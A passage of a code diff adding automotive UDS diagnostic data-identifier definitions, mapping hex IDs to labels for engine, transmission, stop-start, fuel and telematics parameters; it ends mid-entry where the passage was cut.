+UDS_RDBI.dataIdentifiers[0x25c2] = "Voltage supplied to the Electro motorized Wastegate sensor" +UDS_RDBI.dataIdentifiers[0x25c3] = "PWM command asked to the Hbridge" +UDS_RDBI.dataIdentifiers[0x25c4] = "Absolute position setpoint really given to the RST controller" +UDS_RDBI.dataIdentifiers[0x25c5] = "Position setpoint used by the monitoring system" +UDS_RDBI.dataIdentifiers[0x25c6] = "Electrical wastegate position relative to the closed thrust" +UDS_RDBI.dataIdentifiers[0x25c7] = "value of the last open thrust position learnt" +UDS_RDBI.dataIdentifiers[0x25c8] = "value of the first open thrust position learnt" +UDS_RDBI.dataIdentifiers[0x25c9] = "value of the open thrust position used by the regulation system" +UDS_RDBI.dataIdentifiers[0x25ca] = "value of the last closed thrust position learnt" +UDS_RDBI.dataIdentifiers[0x25cb] = "value of the first closed thrust position learnt" +UDS_RDBI.dataIdentifiers[0x25cc] = "value of the closed thrust position used by the regulation system" +UDS_RDBI.dataIdentifiers[0x25cd] = "Last measured analogic value of the Electro motorized Wastegate position" +UDS_RDBI.dataIdentifiers[0x25ce] = "Electro motorized Wastegate absolute position in percent of the sensor supply voltage" +UDS_RDBI.dataIdentifiers[0x25cf] = "Number of first offset learning failures noticed on successive driving cycles open thrust Stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x25d0] = "Number of first offset learning failures noticed on successive driving cycles closed thrust Stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x25d1] = "Number of dirty closed thrust failures noticed on successive driving cycles Stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x25d2] = "Indicates that the first learning of the open pos has been done If 1 learning is done" +UDS_RDBI.dataIdentifiers[0x25d3] = "Indicates that the first learning of the closed pos has been done If 1 learning is done" +UDS_RDBI.dataIdentifiers[0x25d4] = "Air flap set point" +UDS_RDBI.dataIdentifiers[0x25d5] = "Catalyst diagnosis criteria" +UDS_RDBI.dataIdentifiers[0x25d6] = "Circulation request of the coolant for engine" +UDS_RDBI.dataIdentifiers[0x25d8] = "By pass activation for Air flaps command" +UDS_RDBI.dataIdentifiers[0x25d9] = "Air flaps command value" +UDS_RDBI.dataIdentifiers[0x25e0] = "25E1 2600" +UDS_RDBI.dataIdentifiers[0x2600] = "K T BattPackHighTemp Cal" # or 2601 2620 +UDS_RDBI.dataIdentifiers[0x2601] = "K T BattPackHighTempHys Cal" +UDS_RDBI.dataIdentifiers[0x2602] = "K T BattFanHighDeltaTemp Cal" +UDS_RDBI.dataIdentifiers[0x2603] = "K T BattFanHighDeltaTempHys Cal" +UDS_RDBI.dataIdentifiers[0x2620] = "2621 2640" +UDS_RDBI.dataIdentifiers[0x2800] = "EGFP Raw EGFP Raw" # or EgfAgSnsr1Volt volt, 2801 2820 +UDS_RDBI.dataIdentifiers[0x2801] = "EgfPosnCtl percSp" # or EGFP SetVal +UDS_RDBI.dataIdentifiers[0x2802] = "SCRT SCRT" +UDS_RDBI.dataIdentifiers[0x2803] = "LEGRT Raw LEGRT Raw" +UDS_RDBI.dataIdentifiers[0x2804] = "EGT" # or Transmission High Side Driver 1 Control Circuit, EGT EGT, Main injection period +UDS_RDBI.dataIdentifiers[0x2805] = "DT LEGRT LEGRT" # or Transmission High Side Driver 2 Control Circuit, LEGRT +UDS_RDBI.dataIdentifiers[0x2806] = "LEGRT OBD LEGRT OBD" +UDS_RDBI.dataIdentifiers[0x2807] = "DPFLR PDiff Raw" # or Ignition advance, LEGR PDiff Raw LEGR PDiff Raw +UDS_RDBI.dataIdentifiers[0x2808] = "Main injection advance" # or LEGR Pdiff LEGR PDiff, DPFLR Pdiff +UDS_RDBI.dataIdentifiers[0x2809] = "LEGR PDiff OBD LEGR PDiff OBD" # or Main injection quantity, DPFLR PDiff OBD +UDS_RDBI.dataIdentifiers[0x280a] = "Pre injection 1 quantity" # or ECT, ECT ECT +UDS_RDBI.dataIdentifiers[0x280b] = "AAP" # or Pre injection 2 quantity, AAP AAP +UDS_RDBI.dataIdentifiers[0x280c] = "EGP" # or EGP EGP, After injection quantity +UDS_RDBI.dataIdentifiers[0x280d] = "EGFP Trnsp EGFP Trnsp" # or Post injection quantity, EgfPosnCtl percSpDtm, Transmission Control Module Substrate Temperature +UDS_RDBI.dataIdentifiers[0x280e] = "EGFC LrndLoPosn EGFC LrndLoPosn" # or Late post injection quantity +UDS_RDBI.dataIdentifiers[0x280f] = "EGFC LrndUpPosn EGFC LrndUpPosn" +UDS_RDBI.dataIdentifiers[0x2810] = "Pre injection 1 desired time" # or Eng Trq Eng Trq, Eng Trq +UDS_RDBI.dataIdentifiers[0x2811] = "Exhaust gas flap Out" # or Pre injection 2 desired time, Pressure Control Solenoid 1 Output, EGFC Out +UDS_RDBI.dataIdentifiers[0x2812] = "TSPC Med TSPC Med" # or After injection desired time, TSPC Med, Pressure Control Solenoid 2 Output +UDS_RDBI.dataIdentifiers[0x2813] = "TSPC EngStart" # or Pressure Control Solenoid 3 Output, TSPC EngStart Mode TSPC EngStart, Post injection angle +UDS_RDBI.dataIdentifiers[0x2814] = "LEGRFP Raw LEGRFP Raw" # or Pressure Control Solenoid 4 Output, EgrfAgSnsr1Volt volt +UDS_RDBI.dataIdentifiers[0x2815] = "Klemme87 Ruckmeldeleitung Read Klemme87 Ruckmeldeleitung" # or Pressure Control Solenoid 5 Output +UDS_RDBI.dataIdentifiers[0x2817] = "Pressure Control Solenoid 1 Commanded Pressure" +UDS_RDBI.dataIdentifiers[0x2818] = "Pressure Control Solenoid 2 Commanded Pressure" +UDS_RDBI.dataIdentifiers[0x2819] = "Pressure Control Solenoid 3 Commanded Pressure" +UDS_RDBI.dataIdentifiers[0x281a] = "Pressure Control Solenoid 4 Commanded Pressure" +UDS_RDBI.dataIdentifiers[0x281b] = "Pressure Control Solenoid 5 Commanded Pressure" # or low level +UDS_RDBI.dataIdentifiers[0x281c] = "Gas pump command state" +UDS_RDBI.dataIdentifiers[0x281d] = "Transmission Pressure Switch" +UDS_RDBI.dataIdentifiers[0x281e] = "X-Valve Solenoid" +UDS_RDBI.dataIdentifiers[0x281f] = "Y-Valve Solenoid" +UDS_RDBI.dataIdentifiers[0x2820] = "2821 2840" +UDS_RDBI.dataIdentifiers[0x2822] = "TISS/TOSS Regulated Voltage Supply" # or Canister drain valve command +UDS_RDBI.dataIdentifiers[0x2824] = "Transmission Cleaning Procedure" +UDS_RDBI.dataIdentifiers[0x2826] = "Transmission Control Module Restart Sensor Temperature" +UDS_RDBI.dataIdentifiers[0x2827] = "MCPA Motor B Temperature" +UDS_RDBI.dataIdentifiers[0x2828] = "MCPB Motor A Temperature" +UDS_RDBI.dataIdentifiers[0x2829] = "MCPA Motor B Current Commanded" +UDS_RDBI.dataIdentifiers[0x282a] = "MCPB Motor A Current Commanded" +UDS_RDBI.dataIdentifiers[0x282b] = "Motor A Current Actual" +UDS_RDBI.dataIdentifiers[0x282c] = "Motor B Current Actual" +UDS_RDBI.dataIdentifiers[0x2831] = "MCPA Motor B Phase A Current" +UDS_RDBI.dataIdentifiers[0x2832] = "MCPB Motor A Phase A Current" +UDS_RDBI.dataIdentifiers[0x2835] = "MCPA Motor B Phase B Current" +UDS_RDBI.dataIdentifiers[0x2836] = "MCPB Motor A Phase B Current" +UDS_RDBI.dataIdentifiers[0x2839] = "MCPA Motor B Phase C Current" +UDS_RDBI.dataIdentifiers[0x283a] = "MCPB Motor A Phase C Current" +UDS_RDBI.dataIdentifiers[0x283f] = "MCPA Motor B Temperature Sensor A/D" # or System diagnosis criterion global deviation of richness closed loop control +UDS_RDBI.dataIdentifiers[0x2840] = "MCPB Motor A Temperature Sensor A/D" # or 2841 2860 +UDS_RDBI.dataIdentifiers[0x2841] = "MCPA Motor B Torque Commanded" +UDS_RDBI.dataIdentifiers[0x2842] = "MCPB Motor A Torque Commanded" # or Misfire counter cylinder 2 +UDS_RDBI.dataIdentifiers[0x2843] = "Misfire counter cylinder 3" # or MCPA Motor B Torque Actual +UDS_RDBI.dataIdentifiers[0x2844] = "MCPB Motor A Torque Actual" +UDS_RDBI.dataIdentifiers[0x2847] = "System Mode Commanded" +UDS_RDBI.dataIdentifiers[0x2848] = "Knock counter detection cylinder 2" # or System Mode Actual +UDS_RDBI.dataIdentifiers[0x2849] = "Knock counter detection cylinder 3" +UDS_RDBI.dataIdentifiers[0x284a] = "Transmission" +UDS_RDBI.dataIdentifiers[0x284b] = "MCPA Motor B Speed Actual" +UDS_RDBI.dataIdentifiers[0x284c] = "MCPB Motor A Speed Actual" +UDS_RDBI.dataIdentifiers[0x284d] = "Mean knock noise" # or MCPA Motor B Angle - Resolver Absolute Position +UDS_RDBI.dataIdentifiers[0x284e] = "MCPB Motor A Angle - Resolver Absolute Position" # or Richness regulation status +UDS_RDBI.dataIdentifiers[0x284f] = "MCPA Motor B Speed Sensor Position Offset" # or Richness regulation status bank +UDS_RDBI.dataIdentifiers[0x2850] = "Richness regulation correction" # or MCPB Motor A Speed Sensor Position Offset +UDS_RDBI.dataIdentifiers[0x2851] = "Transmission C1 Clutch Slip" +UDS_RDBI.dataIdentifiers[0x2852] = "Transmission C2 Clutch Slip" +UDS_RDBI.dataIdentifiers[0x2853] = "Transmission C3 Clutch Slip" +UDS_RDBI.dataIdentifiers[0x2854] = "Transmission C4 Clutch Slip" # or Injection time cylinder 1 1st injection +UDS_RDBI.dataIdentifiers[0x2855] = "Injection time cylinder 2 1st injection" # or Transmission Clutch +UDS_RDBI.dataIdentifiers[0x2856] = "Injection time cylinder 3 1st injection" +UDS_RDBI.dataIdentifiers[0x2857] = "Injection time cylinder 4 1st injection" +UDS_RDBI.dataIdentifiers[0x2858] = "Motor Control" +UDS_RDBI.dataIdentifiers[0x2859] = "Pressure Control Solenoid 6 Output" +UDS_RDBI.dataIdentifiers[0x285a] = "Opening angle cylinder 1 1st injection" # or Pressure Control Solenoid 6 Commanded Pressure +UDS_RDBI.dataIdentifiers[0x285b] = "Opening angle cylinder 2 1st injection" +UDS_RDBI.dataIdentifiers[0x285c] = "Opening angle cylinder 3 1st injection" +UDS_RDBI.dataIdentifiers[0x285d] = "Opening angle cylinder 4 1st injection" +UDS_RDBI.dataIdentifiers[0x285e] = "Maximum ignition timing correction of the slow loop for all the cylinders" +UDS_RDBI.dataIdentifiers[0x285f] = "Adaptation offset on injection time" +UDS_RDBI.dataIdentifiers[0x2860] = "2861 2880" +UDS_RDBI.dataIdentifiers[0x2861] = "Gas pump priming state" +UDS_RDBI.dataIdentifiers[0x2862] = "Gas pump priming done" +UDS_RDBI.dataIdentifiers[0x2863] = "Minimum gap compared to the initial linear" +UDS_RDBI.dataIdentifiers[0x2864] = "Maximum gap compared to the initial linear" +UDS_RDBI.dataIdentifiers[0x2865] = "Boolean for information at least one learning in the zone" +UDS_RDBI.dataIdentifiers[0x2866] = "4 of the 5 zones engine learned" +UDS_RDBI.dataIdentifiers[0x2867] = "Learning counter to adaptive least square method" +UDS_RDBI.dataIdentifiers[0x2869] = "Injection time cylinder 1 2nd injection" +UDS_RDBI.dataIdentifiers[0x286a] = "Injection time cylinder 2 2nd injection" +UDS_RDBI.dataIdentifiers[0x286b] = "Injection time cylinder 3 2nd injection" +UDS_RDBI.dataIdentifiers[0x286c] = "Injection time cylinder 4 2nd injection" +UDS_RDBI.dataIdentifiers[0x286d] = "Opening angle cylinder 1 2nd injection" +UDS_RDBI.dataIdentifiers[0x286e] = "Opening angle cylinder 2 2nd injection" +UDS_RDBI.dataIdentifiers[0x286f] = "Opening angle cylinder 3 2nd injection" +UDS_RDBI.dataIdentifiers[0x2870] = "Opening angle cylinder 4 2nd injection" +UDS_RDBI.dataIdentifiers[0x2871] = "Piloted thermostat PWM command" +UDS_RDBI.dataIdentifiers[0x2872] = "Corrective factor depending on exotic fuel quantity For injection time" +UDS_RDBI.dataIdentifiers[0x2873] = "Corrected average ALFACL for memorized fuel system diagnostic" +UDS_RDBI.dataIdentifiers[0x2874] = "Misfire counter" +UDS_RDBI.dataIdentifiers[0x2875] = "External controls denial status flag" +UDS_RDBI.dataIdentifiers[0x2876] = "4 first column of the pre control working matrix stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x2877] = "4 last column of the pre control working matrix stored in EEPROM" +UDS_RDBI.dataIdentifiers[0x287b] = "Final alcohol adaptive" +UDS_RDBI.dataIdentifiers[0x287c] = "value of the counter of slow alcohol adaptive computing phases" +UDS_RDBI.dataIdentifiers[0x287d] = "Low limit of the adaptive" +UDS_RDBI.dataIdentifiers[0x287e] = "High limit of the adaptive" +UDS_RDBI.dataIdentifiers[0x287f] = "Memorized variable of the fuel level" +UDS_RDBI.dataIdentifiers[0x2880] = "2881 28A0" +UDS_RDBI.dataIdentifiers[0x2881] = "Alcohol rate for the after sell" +UDS_RDBI.dataIdentifiers[0x2884] = "Minimum level of the additional fuel tank detected" +UDS_RDBI.dataIdentifiers[0x2887] = "PWM of fuel pump actuator" +UDS_RDBI.dataIdentifiers[0x2888] = "PCU pwm feedback" +UDS_RDBI.dataIdentifiers[0x288d] = "Minimum gap compared to the initial linear Write 2" +UDS_RDBI.dataIdentifiers[0x288e] = "Maximum gap compared to the initial linear Write 2" +UDS_RDBI.dataIdentifiers[0x288f] = "Activation request of mastervac factory diagnostic sequence at first power supply of ECU" +UDS_RDBI.dataIdentifiers[0x2890] = "Mastervac pressure switch state" +UDS_RDBI.dataIdentifiers[0x2891] = "Mastervac vacuum pump activation request" +UDS_RDBI.dataIdentifiers[0x2892] = "Cumulative run time for mastervac vacuum pump" +UDS_RDBI.dataIdentifiers[0x2893] = "Mastervac pressure received on CAN" +UDS_RDBI.dataIdentifiers[0x2897] = "Turbo water pump configuration boolean" +UDS_RDBI.dataIdentifiers[0x28a0] = "28A1 28C0" +UDS_RDBI.dataIdentifiers[0x28a1] = "Cloture advance of split injection" +UDS_RDBI.dataIdentifiers[0x28a2] = "Cloture advance of main injection in regulation mode" +UDS_RDBI.dataIdentifiers[0x28a3] = "Mass to be injected on cylinder 1 on pulse 1 of injection" +UDS_RDBI.dataIdentifiers[0x28a4] = "Mass to be injected on cylinder 1 on pulse 2 of injection" +UDS_RDBI.dataIdentifiers[0x28a5] = "Mass to be injected on cylinder 2 on pulse 1 of injection" +UDS_RDBI.dataIdentifiers[0x28a6] = "Mass to be injected on cylinder 2 on pulse 2 of injection" +UDS_RDBI.dataIdentifiers[0x28a7] = "Mass to be injected on cylinder 3 on pulse 1 of injection" +UDS_RDBI.dataIdentifiers[0x28a8] = "Mass to be injected on cylinder 3 on pulse 2 of injection" +UDS_RDBI.dataIdentifiers[0x28a9] = "Mass to be injected on cylinder 4 on pulse 1 of injection" +UDS_RDBI.dataIdentifiers[0x28aa] = "Mass to be injected on cylinder 4 on pulse 2 of injection" +UDS_RDBI.dataIdentifiers[0x28ab] = "Gasoline to LPG transition" +UDS_RDBI.dataIdentifiers[0x28ac] = "Gasoline mode" +UDS_RDBI.dataIdentifiers[0x28ad] = "LPG to Gasoline transition" +UDS_RDBI.dataIdentifiers[0x28ae] = "LPG mode" +UDS_RDBI.dataIdentifiers[0x28af] = "LPG Fuel low level" +UDS_RDBI.dataIdentifiers[0x28b0] = "LPG Switch Position" +UDS_RDBI.dataIdentifiers[0x28b1] = "Gas temperature manifold level" +UDS_RDBI.dataIdentifiers[0x28b2] = "Boolean for setting to zero the two fuel mass corrections" +UDS_RDBI.dataIdentifiers[0x28b3] = "Boolean to reset to calibrated values the learned map and the learning counter" +UDS_RDBI.dataIdentifiers[0x28b4] = "First vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28b5] = "Second vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28b6] = "Third vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28b7] = "Fourth vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28b8] = "Fifth vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28b9] = "Sixth vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28ba] = "Seventh vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28bb] = "Eighth vector of open loop map for fuel injected mass correction" +UDS_RDBI.dataIdentifiers[0x28bc] = "Counter of fuel injected mass correction learning events" +UDS_RDBI.dataIdentifiers[0x28bd] = "GDI Fuel Rail Pressure" +UDS_RDBI.dataIdentifiers[0x28be] = "Rail pressure setpoint" +UDS_RDBI.dataIdentifiers[0x28bf] = "Long Term Fuel Trim Bank" +UDS_RDBI.dataIdentifiers[0x28c0] = "28C1 28E0" +UDS_RDBI.dataIdentifiers[0x28c1] = "Indicator relative to vehicle acceleration for economical scoring" +UDS_RDBI.dataIdentifiers[0x28c2] = "Indicator relative to anticipation for economical scoring" +UDS_RDBI.dataIdentifiers[0x28c3] = "Indicator relative to GSI respect for economical scoring" +UDS_RDBI.dataIdentifiers[0x28c4] = "Indicator of economical monitoring" +UDS_RDBI.dataIdentifiers[0x28c5] = "A F Ratio" +UDS_RDBI.dataIdentifiers[0x28c6] = "Global injected fuel mass request" +UDS_RDBI.dataIdentifiers[0x28c7] = "air flaps PWM command Read air flaps PWM command" +UDS_RDBI.dataIdentifiers[0x28d2] = "Mux Network configuration detection EMCU Control Unit status" +UDS_RDBI.dataIdentifiers[0x28d3] = "Air flaps initialization sequence activation" +UDS_RDBI.dataIdentifiers[0x28d4] = "DMS order Normal sport" +UDS_RDBI.dataIdentifiers[0x28d6] = "RS mode request Normal sport or Race" +UDS_RDBI.dataIdentifiers[0x28d7] = "Commercial engine power display" +UDS_RDBI.dataIdentifiers[0x28d8] = "Begin high stroke sensor is activated" +UDS_RDBI.dataIdentifiers[0x28d9] = "State of the begin high of the clutch pedal 0 pedal released 1 pedal pressed" +UDS_RDBI.dataIdentifiers[0x28da] = "Wire begin high clutch contactor state" +UDS_RDBI.dataIdentifiers[0x28dd] = "After sale alternator voltage set point" +UDS_RDBI.dataIdentifiers[0x28df] = "Filtered alternator rotor current" +UDS_RDBI.dataIdentifiers[0x28e0] = "28E1 2900" +UDS_RDBI.dataIdentifiers[0x28e1] = "Alternator load" +UDS_RDBI.dataIdentifiers[0x28fc] = "Command of the drain cut valve for the EVAP diagnosis" +UDS_RDBI.dataIdentifiers[0x2900] = "2901 2920" +UDS_RDBI.dataIdentifiers[0x291b] = "Water pump water charge command state" +UDS_RDBI.dataIdentifiers[0x291c] = "ADOC configuration" +UDS_RDBI.dataIdentifiers[0x291d] = "ignition advance state" +UDS_RDBI.dataIdentifiers[0x291e] = "State counter value for each RON level" +UDS_RDBI.dataIdentifiers[0x2920] = "2921 2940" +UDS_RDBI.dataIdentifiers[0x2921] = "FAN 1 activation" +UDS_RDBI.dataIdentifiers[0x2922] = "FAN 2 activation" +UDS_RDBI.dataIdentifiers[0x2923] = "Mux Network configuration detection AIRBAG status" +UDS_RDBI.dataIdentifiers[0x2924] = "Airbag crash status" +UDS_RDBI.dataIdentifiers[0x2925] = "State of rear motor fan thermic activation request" +UDS_RDBI.dataIdentifiers[0x2926] = "Controlled rear motor fan applied command" +UDS_RDBI.dataIdentifiers[0x2927] = "Motor driven fan setpoint" +UDS_RDBI.dataIdentifiers[0x2928] = "Functionnal state of the vehicle with Stop and Start system" +UDS_RDBI.dataIdentifiers[0x2929] = "Functionnal state of the vehicle with Stop and Start system 01" +UDS_RDBI.dataIdentifiers[0x292c] = "Starter status 01" +UDS_RDBI.dataIdentifiers[0x2932] = "Median of pressures whose sensors are liable to rationality diagnosis" +UDS_RDBI.dataIdentifiers[0x2933] = "median of temperatures whose sensors are liable to rationality diagnosis" +UDS_RDBI.dataIdentifiers[0x2934] = "Boolean indicating that upstream lambda heater close loop control is enabled" +UDS_RDBI.dataIdentifiers[0x2939] = "The alcohol rate jump learning is activated" +UDS_RDBI.dataIdentifiers[0x293a] = "Total vehicle distance when the last learning process finished" +UDS_RDBI.dataIdentifiers[0x293b] = "Alcohol rate of the new fuel put into the tank" +UDS_RDBI.dataIdentifiers[0x293c] = "Percentage of the new fuel in the tank" +UDS_RDBI.dataIdentifiers[0x293d] = "Quantity of fuel consumed since last alcohol rate learning process" +UDS_RDBI.dataIdentifiers[0x293e] = "Quantity of fuel consumed since last tank fill up" +UDS_RDBI.dataIdentifiers[0x293f] = "Value of the alcohol adaptive before the tank filling" +UDS_RDBI.dataIdentifiers[0x2940] = "2941 2960" +UDS_RDBI.dataIdentifiers[0x2941] = "Boolean to indicate that there is a possible change of fuel in course" +UDS_RDBI.dataIdentifiers[0x2945] = "Drive door state" +UDS_RDBI.dataIdentifiers[0x2946] = "Drive seat state" +UDS_RDBI.dataIdentifiers[0x2947] = "Engine hood state" +UDS_RDBI.dataIdentifiers[0x2948] = "Drive seat belt reminder" +UDS_RDBI.dataIdentifiers[0x2949] = "Stop and Start status parameters" +UDS_RDBI.dataIdentifiers[0x294d] = "Warning automatic stop engine" +UDS_RDBI.dataIdentifiers[0x294e] = "Technical start request" +UDS_RDBI.dataIdentifiers[0x294f] = "Vehicle will not moving" +UDS_RDBI.dataIdentifiers[0x2951] = "Stop auto exit" +UDS_RDBI.dataIdentifiers[0x2953] = "Inhibition of Stop Start by a diag tool request" +UDS_RDBI.dataIdentifiers[0x2954] = "Vehicle whit key or keyless vehicle" +UDS_RDBI.dataIdentifiers[0x2955] = "Stop auto inhibition via automatic air conditioner" +UDS_RDBI.dataIdentifiers[0x2956] = "Begin stroke clutch pedal switch" +UDS_RDBI.dataIdentifiers[0x2958] = "state of charge" +UDS_RDBI.dataIdentifiers[0x2959] = "Automatic Start requested by driver" +UDS_RDBI.dataIdentifiers[0x2960] = "2961 2980" +UDS_RDBI.dataIdentifiers[0x2980] = "2981 29A0" +UDS_RDBI.dataIdentifiers[0x298f] = "Displaying of Stop and Start request 01" +UDS_RDBI.dataIdentifiers[0x2990] = "Maximum duration the engine can stay automatically stopped" +UDS_RDBI.dataIdentifiers[0x2991] = "Ambiant pressure high threshold below which auto stop is forbidden" +UDS_RDBI.dataIdentifiers[0x2992] = "Ambiant pressure low threshold below which auto stop is forbidden" +UDS_RDBI.dataIdentifiers[0x2993] = "Minimum speed threshold to go to StopAuto after a deactivation of 4WD function" +UDS_RDBI.dataIdentifiers[0x2994] = "Maximum delay to confirm a StopAuto request by the driver by braking pressure" +UDS_RDBI.dataIdentifiers[0x2995] = "Delay before prompting auto stop MMI" +UDS_RDBI.dataIdentifiers[0x2996] = "Maximun number of start for the high pressure pump to inhibite Stop and start" +UDS_RDBI.dataIdentifiers[0x2997] = "Maximum slope value to authorize StopAuto negative value" +UDS_RDBI.dataIdentifiers[0x2998] = "Maximum slope value to authorize StopAuto positive value" +UDS_RDBI.dataIdentifiers[0x2999] = "Delay to detect rear gear engaged" +UDS_RDBI.dataIdentifiers[0x299a] = "Maximun number of activation of starter to inhibite Stop and start" +UDS_RDBI.dataIdentifiers[0x299b] = "Maximal environment temperature inhibiting the StopAuto" +UDS_RDBI.dataIdentifiers[0x299c] = "Maximal environment temperature authorising the StopAuto" +UDS_RDBI.dataIdentifiers[0x299d] = "Minimal environment temperature inhibiting the StopAuto" +UDS_RDBI.dataIdentifiers[0x299e] = "Minimal environment temperature authorising the StopAuto" +UDS_RDBI.dataIdentifiers[0x299f] = "Maximum vehicle speed to keep the engine automatically stopped" +UDS_RDBI.dataIdentifiers[0x29a0] = "29A1 29C0" +UDS_RDBI.dataIdentifiers[0x29a1] = "Delay to confirm that the vehicle is stoped consolidation of slope value" +UDS_RDBI.dataIdentifiers[0x29a2] = "Vehicle speed threshold to validate the minimum travel conditions" +UDS_RDBI.dataIdentifiers[0x29a3] = "Vehicle speed threshold to validate the minimum travel conditions in rear detected" +UDS_RDBI.dataIdentifiers[0x29a4] = "Vehicle speed threshold to authorize automatic stop" +UDS_RDBI.dataIdentifiers[0x29a7] = "StopAuto status StopAutoPhase" +UDS_RDBI.dataIdentifiers[0x29a9] = "Gear lever position received on the CAN" +UDS_RDBI.dataIdentifiers[0x29b0] = "CC strategy requested by the driver for Daimler type" +UDS_RDBI.dataIdentifiers[0x29b1] = "CC Main Switch Coherence detected failure for Daimler type" +UDS_RDBI.dataIdentifiers[0x29c0] = "29C1 29E0" +UDS_RDBI.dataIdentifiers[0x29e0] = "29E1 2A00" +UDS_RDBI.dataIdentifiers[0x29e1] = "Distance driven since HBN initialization" +UDS_RDBI.dataIdentifiers[0x29e2] = "Misfire bench mode activation boolean" +UDS_RDBI.dataIdentifiers[0x29e3] = "Rate of Misfire bench mode" +UDS_RDBI.dataIdentifiers[0x29e5] = "Bench value to adapt richness on all cylinders" +UDS_RDBI.dataIdentifiers[0x29e6] = "Delay before authorizing richness closed loop after start bench mode required for homologation" +UDS_RDBI.dataIdentifiers[0x29e7] = "Boolean enabling the canister purge fault bench mode" +UDS_RDBI.dataIdentifiers[0x29e8] = "Mastervac vacuum relative pressure by analog sensor" +UDS_RDBI.dataIdentifiers[0x29e9] = "The weighted average voltage of master vacuum absolute pressure sensor" +UDS_RDBI.dataIdentifiers[0x2c00] = "2C01 2C20" +UDS_RDBI.dataIdentifiers[0x2c03] = "Targetted gear engaged" +UDS_RDBI.dataIdentifiers[0x2c04] = "Auxiliary Transmission Pump Speed Commanded" # or gear engaged +UDS_RDBI.dataIdentifiers[0x2c05] = "Auxiliary Transmission Pump Speed Actual" +UDS_RDBI.dataIdentifiers[0x2c06] = "Auxiliary Transmission Pump Fault" +UDS_RDBI.dataIdentifiers[0x2c20] = "2C21 2C40" +UDS_RDBI.dataIdentifiers[0x2c2c] = "Kick down state" +UDS_RDBI.dataIdentifiers[0x2c40] = "2C41 2C60" +UDS_RDBI.dataIdentifiers[0x2c4f] = "ACC steering wheel commands validity transmitted to ACC ECU" +UDS_RDBI.dataIdentifiers[0x2c50] = "ACC steering wheel commands transmitted to ACC ECU" +UDS_RDBI.dataIdentifiers[0x2c51] = "ACC speed limiter main switch position transmitted to ACC ECU" +UDS_RDBI.dataIdentifiers[0x2c57] = "Driving gear on active shaft" +UDS_RDBI.dataIdentifiers[0x2c58] = "Clutch torque" +UDS_RDBI.dataIdentifiers[0x2c59] = "State of active clutch" +UDS_RDBI.dataIdentifiers[0x2c5b] = "Request to authorize the cranking according to the gear lever position and internal diagnosis of the ATCU" +UDS_RDBI.dataIdentifiers[0x2c5c] = "Automatic transmission range output for display" +UDS_RDBI.dataIdentifiers[0x2c5d] = "Target gear for active shaft" +UDS_RDBI.dataIdentifiers[0x2c60] = "2C61 2C80" +UDS_RDBI.dataIdentifiers[0x2c80] = "2C81 2CA0" +UDS_RDBI.dataIdentifiers[0x2c9b] = "Automatic Transmission output shaft revolution speed" +UDS_RDBI.dataIdentifiers[0x2d00] = "2D01 2D20" +UDS_RDBI.dataIdentifiers[0x2d40] = "2D41 2D60" +UDS_RDBI.dataIdentifiers[0x2d80] = "2D81 2DA0" +UDS_RDBI.dataIdentifiers[0x2e00] = "2E01 2E20" +UDS_RDBI.dataIdentifiers[0x2e01] = "IOC TCU Outputs ECall LED" +UDS_RDBI.dataIdentifiers[0x2e02] = "IOC TCU Antennas Active Phone Antenna" +UDS_RDBI.dataIdentifiers[0x2f01] = "OMA DM Server URL" +UDS_RDBI.dataIdentifiers[0x2f02] = "Vehicle Configuration" +UDS_RDBI.dataIdentifiers[0x2f03] = "ATP Base URL" +UDS_RDBI.dataIdentifiers[0x2f04] = "SMS Destinations" +UDS_RDBI.dataIdentifiers[0x2f05] = "Call Numbers" +UDS_RDBI.dataIdentifiers[0x2f06] = "Service Call Provider" +UDS_RDBI.dataIdentifiers[0x2f07] = "HU Connectiivity WCC settings" +UDS_RDBI.dataIdentifiers[0x2f08] = "ATP RCS URL" +UDS_RDBI.dataIdentifiers[0x2f09] = "APN URLs" +UDS_RDBI.dataIdentifiers[0x2f0a] = "MTU Size" +UDS_RDBI.dataIdentifiers[0x2f0b] = "Internet Connectivity Settings" +UDS_RDBI.dataIdentifiers[0x2f0c] = "Independent car heating settings" +UDS_RDBI.dataIdentifiers[0x2f0d] = "APN settings" +UDS_RDBI.dataIdentifiers[0x2fc1] = "freigegebene Schluessellinien" +UDS_RDBI.dataIdentifiers[0x2fd1] = "Schluessel Set Identification SSID" +UDS_RDBI.dataIdentifiers[0x2fe1] = "Zentralverriegelung Status gespeicherter Status Kofferraum" +UDS_RDBI.dataIdentifiers[0x2ff1] = "Pattern fuer HF Patternvergleich Testpattern Block1" +UDS_RDBI.dataIdentifiers[0x3000] = "Thatcham Einschalten Ausschalten Anfrage THATCHAM" +UDS_RDBI.dataIdentifiers[0x3001] = "Thatcham passive Linien Linie" +UDS_RDBI.dataIdentifiers[0x3004] = "Digitale Schalterleisten \"High\" erkannt Leiste" +UDS_RDBI.dataIdentifiers[0x3005] = "HU Connectivity USB Status State" +UDS_RDBI.dataIdentifiers[0x3006] = "NVLD Switch" # or Digitale Schalterleisten \"Low\" erkannt Leiste +UDS_RDBI.dataIdentifiers[0x3008] = "IP Addresses IP Address Type Data Radio Bearer" # or Zuendung Klemme15 Read Response Parameters Zuendung Klemme15 +UDS_RDBI.dataIdentifiers[0x3009] = "Zuendung Klemme15 plausibilisiert" +UDS_RDBI.dataIdentifiers[0x300f] = "APN Users" +UDS_RDBI.dataIdentifiers[0x3010] = "Gangsensor SG Vertikal 1 ROH" # or APN Passwords, Motoroelschalter +UDS_RDBI.dataIdentifiers[0x3011] = "Kraftstoffanforderung HW" # or Kickdownschalter / -erkennung, Gangsensor SG Vertikal 2 ROH, System Time, System Time UTC Unix Time Stamp Format +UDS_RDBI.dataIdentifiers[0x3012] = "Bremsschalter" # or Gangsensor SG Neutrallage +UDS_RDBI.dataIdentifiers[0x3013] = "Bremslichtschalter" +UDS_RDBI.dataIdentifiers[0x3014] = 